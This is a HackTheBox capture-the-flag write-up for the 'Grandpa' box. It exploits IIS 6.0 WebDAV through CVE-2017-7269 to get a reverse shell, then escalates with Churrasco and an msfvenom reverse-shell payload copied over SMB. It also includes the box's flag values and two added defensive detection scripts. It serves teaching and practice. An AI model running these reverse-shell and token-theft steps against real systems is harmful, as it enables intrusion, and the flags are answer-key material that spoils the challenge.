HackTheBox | Grandpa

By 0xBEN
Nmap Results

# Nmap 7.92 scan initiated Sat Aug 20 22:37:39 2022 as: nmap -T5 -p80 -A -oA scan-all -Pn 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.014s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Sun, 21 Aug 2022 02:37:51 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   15.02 ms 10.10.14.1
2   15.05 ms 10.10.10.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 20 22:37:52 2022 -- 1 IP address (1 host up) scanned in 13.64 seconds





Service Enumeration

TCP/80

Gobuster Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx -t 50 -o gobuster-out -r

/Images               (Status: 403) [Size: 218]
/_private             (Status: 403) [Size: 1529]
/_vti_cnf             (Status: 403) [Size: 1529]
/_vti_log             (Status: 403) [Size: 1529]
/_vti_pvt             (Status: 403) [Size: 1529]
/_vti_txt             (Status: 403) [Size: 1529]
/_vti_inf.html        (Status: 200) [Size: 1754]
/_vti_bin             (Status: 403) [Size: 218] 
/aspnet_client        (Status: 403) [Size: 218] 
/images               (Status: 403) [Size: 218] 



WebDAV

Unlike the IIS server on Granny, we aren't allowed to use the PUT method on this server. I tried multiple bypass exploits to upload a file to the root of the WebDAV directory, but nothing was sticking.

Then, I decided to give this exploit a try:

CVE-2017-7269/ii6_reverse_shell.py at main · k4u5h41/CVE-2017-7269





Exploit

Review the Exploit

CVE-2017-7269 (MITRE CVE entry)

In order to run this exploit, we need to pass the following arguments in order:

  1. Target IP
  2. Target Port
  3. Listener IP
  4. Listener Port



Start a Listener and Catch a Shell

sudo rlwrap nc -lnvp <listener-tcp-port>
python2 iis_reverse_shell.py <target-ip> <target-port> <listener-ip> <listener-port>
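A defender's counterpart to the exploit above, added here as an example (it is not code from this post or from the k4u5h41 repository): it parses raw HTTP request text from a capture or a header-preserving proxy and flags PROPFIND requests carrying the overlong "If: <http://" header that CVE-2017-7269 abuses. The 512-byte threshold and the two sample requests are assumptions made for the example.

```python
import re

# Assumed threshold: legitimate WebDAV If: headers (lock tokens, ETags) stay far below this.
IF_HEADER_LIMIT = 512

_REQUEST_LINE = re.compile(r"^([A-Z]+)\s+(\S+)\s+HTTP/1\.[01]\s*$")


def parse_request(raw: str):
    """Split one raw HTTP request into (method, path, headers); header names are lowercased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = _REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError("not an HTTP request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return m.group(1), m.group(2), headers


def is_suspicious_propfind(raw: str, limit: int = IF_HEADER_LIMIT) -> bool:
    """True for a PROPFIND whose If: header starts with <http:// and exceeds the limit.

    CVE-2017-7269 is triggered by that header shape, so method, prefix and
    length together form the signature; a bare length check would only add noise.
    """
    method, _path, headers = parse_request(raw)
    if method != "PROPFIND":
        return False
    if_header = headers.get("if", "")
    return if_header.startswith("<http://") and len(if_header) > limit


# Constructed sample requests (not captured traffic); the host is the box's IP from the scan.
BENIGN = (
    "PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\nDepth: 1\r\n"
    "If: <http://10.10.10.14/doc.txt> (<opaquelocktoken:abc>)\r\n\r\n"
)
OVERLONG = (
    "PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\n"
    "If: <http://10.10.10.14/" + "A" * 1000 + ">\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("overlong", OVERLONG)):
        print(label, "->", "ALERT" if is_suspicious_propfind(req) else "ok")
```

IIS's default W3C log fields do not record the If: header, so this check needs packet-level or proxy data rather than the server's own logs.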





Post-Exploit Enumeration

Current User

User Name                    SID     
============================ ========
nt authority\network service S-1-5-20


GROUP INFORMATION
-----------------

Group Name                       Type             SID                                            Attributes                                        
================================ ================ ============================================== ==================================================
NT AUTHORITY\NETWORK SERVICE     User             S-1-5-20                                       Mandatory group, Enabled by default, Enabled group
Everyone                         Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
GRANPA\IIS_WPG                   Alias            S-1-5-21-1709780765-3897210020-3926566182-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users    Alias            S-1-5-32-559                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                    Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE             Well-known group S-1-5-6                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization   Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
LOCAL                            Well-known group S-1-2-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                    Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled



OS & Kernel

Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 2 Hours, 0 Minutes, 7 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2293 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 713 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,256 MB
Page File: In Use:         214 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A



Users

User accounts for \\GRANPA

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest                    
Harry                    IUSR_GRANPA              IWAM_GRANPA              
SUPPORT_388945a0         



Groups

Aliases for \\GRANPA

-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Distributed COM Users
*Guests
*HelpServicesGroup
*IIS_WPG
*Network Configuration Operators
*OWS_209498277_admin
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users



Network

Interfaces
Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.10.10.14
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2


ARP Table
N/A


Routes
N/A


Open Ports
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:1027           0.0.0.0:0              LISTENING       404
  TCP    0.0.0.0:5859           0.0.0.0:0              LISTENING       4
  TCP    10.10.10.14:139        0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING       1936


Ping Sweep
N/A



Processes

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Console                    0         28 K
System                           4 Console                    0        236 K
smss.exe                       272 Console                    0        460 K
csrss.exe                      320 Console                    0      3,344 K
winlogon.exe                   344 Console                    0      9,736 K
services.exe                   392 Console                    0      5,180 K
lsass.exe                      404 Console                    0      7,492 K
svchost.exe                    580 Console                    0      3,052 K
svchost.exe                    668 Console                    0      3,708 K
svchost.exe                    732 Console                    0      4,008 K
svchost.exe                    752 Console                    0      3,448 K
svchost.exe                    788 Console                    0     17,784 K
spoolsv.exe                    924 Console                    0      4,136 K
msdtc.exe                      952 Console                    0      4,424 K
cisvc.exe                     1064 Console                    0      2,504 K
svchost.exe                   1112 Console                    0      2,052 K
inetinfo.exe                  1168 Console                    0      8,688 K
svchost.exe                   1204 Console                    0      1,320 K
VGAuthService.exe             1312 Console                    0      9,068 K
vmtoolsd.exe                  1380 Console                    0     14,416 K
svchost.exe                   1480 Console                    0      5,560 K
svchost.exe                   1588 Console                    0      3,772 K
dllhost.exe                   1764 Console                    0      7,084 K
alg.exe                       1936 Console                    0      2,804 K
wmiprvse.exe                  1964 Console                    0      9,172 K
wmiprvse.exe                  2292 Console                    0      5,076 K
w3wp.exe                      2420 Console                    0     58,752 K
davcdata.exe                  2492 Console                    0      2,688 K
cidaemon.exe                  1100 Console                    0      1,232 K
cidaemon.exe                  1372 Console                    0      1,920 K
cidaemon.exe                  1604 Console                    0      1,340 K
logon.scr                     2964 Console                    0      1,504 K
c.exe                         3308 Console                    0      1,544 K
wmiprvse.exe                  3780 Console                    0      4,212 K
tasklist.exe                  3636 Console                    0      3,668 K



Services

These Windows services are started:

   Application Experience Lookup Service
   Application Layer Gateway Service
   Automatic Updates
   COM+ Event System
   COM+ System Application
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Error Reporting Service
   Event Log
   Help and Support
   HTTP SSL
   IIS Admin Service
   Indexing Service
   IPSEC Services
   Logical Disk Manager
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Print Spooler
   Protected Storage
   Remote Procedure Call (RPC)
   Remote Registry
   Secondary Logon
   Security Accounts Manager
   Server
   Shell Hardware Detection
   System Event Notification
   Task Scheduler
   TCP/IP NetBIOS Helper
   Terminal Services
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Audio
   Windows Firewall/Internet Connection Sharing (ICS)
   Windows Management Instrumentation
   Windows Time
   Wireless Configuration
   Workstation
   World Wide Web Publishing Service



Scheduled Tasks

Unable to enumerate, access denied.





Privilege Escalation

Windows-Exploit-Suggester

On the target, run the command systeminfo and copy the output into a file on Kali. Then, check the target's patch level against a list downloaded from Microsoft.

windows-exploit-suggester.py -u
windows-exploit-suggester.py -d 2022-08-21-mssb.xls -i sysinfo.txt -l



The Grandparents

Since Grandpa is the same operating system as the Granny host, I decided to give the Churrasco exploit another go here. The IIS worker process runs under the NETWORK SERVICE account, and that service account holds SeImpersonatePrivilege (shown as Enabled in the PRIVILEGES INFORMATION output above). Therefore, it is quite easy to steal the SYSTEM token.

The churrasco.exe exploit makes this easy for us by impersonating SYSTEM and executing a payload of our choosing.
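To make the point above concrete from the auditing side, here is an added helper (not code from this post or from Churrasco) that parses whoami /priv style output and reports the privileges that allow token theft or impersonation. The watch-list is an assumption drawn from well-known token-abuse techniques, and the sample input is the privilege table captured earlier on this box.

```python
import re

# Assumed watch-list: privileges that let a service identity obtain or use another account's token.
TOKEN_ABUSE_PRIVS = {
    "SeImpersonatePrivilege": "can impersonate the token of any client it services",
    "SeAssignPrimaryTokenPrivilege": "can start a process under a different primary token",
    "SeDebugPrivilege": "can open any process and duplicate its token",
}

# Matches one data row of the PRIVILEGES INFORMATION table: name, description, state.
_PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")


def parse_privileges(whoami_output: str) -> dict:
    """Return {privilege_name: 'Enabled'|'Disabled'} from whoami /priv style text."""
    privs = {}
    for line in whoami_output.splitlines():
        m = _PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def token_abuse_findings(whoami_output: str) -> list:
    """List (privilege, state, why) for every watch-listed privilege the token holds.

    'Disabled' only means the privilege is not currently enabled in the token;
    the process can still enable it with AdjustTokenPrivileges, so it is reported.
    """
    privs = parse_privileges(whoami_output)
    return [(name, privs[name], why)
            for name, why in TOKEN_ABUSE_PRIVS.items() if name in privs]


# Sample input: the privilege table from the NETWORK SERVICE shell on this box.
SAMPLE = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

if __name__ == "__main__":
    for name, state, why in token_abuse_findings(SAMPLE):
        print("%-30s %-8s %s" % (name, state, why))
```

Running the same check over whoami /all output from every service account you operate shows which identities would hand an attacker a token-impersonation path if their service were compromised.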



Running the Exploit

Download the Exploit

wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe



Generate a Msfvenom Payload

msfvenom -p windows/shell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -f exe -a x86 --platform windows -o privesc.exe



Transfer the Files

Start an SMB Server on Kali

smbserver.py -smb2support evil $PWD



Copy the Files to the Target

Run these commands on the target. They open an SMB client connection to Kali and copy the files onto the target.

copy \\kali-vpn-ip\evil\churrasco.exe .
copy \\kali-vpn-ip\evil\privesc.exe .



Start a Listener on Kali and Run the Exploit

Start the listener on Kali:

sudo rlwrap nc -lnvp <msfvenom-tcp-port>

Run the exploit on the target:

.\churrasco.exe -d .\privesc.exe





Flags

C:\Documents and Settings\Harry\Desktop\user.txt
bdff5ec67c3cff017f2bedc146a5d869


C:\Documents and Settings\Administrator\Desktop\root.txt
9359e905a2c35f861f6a57cecf28bb7b
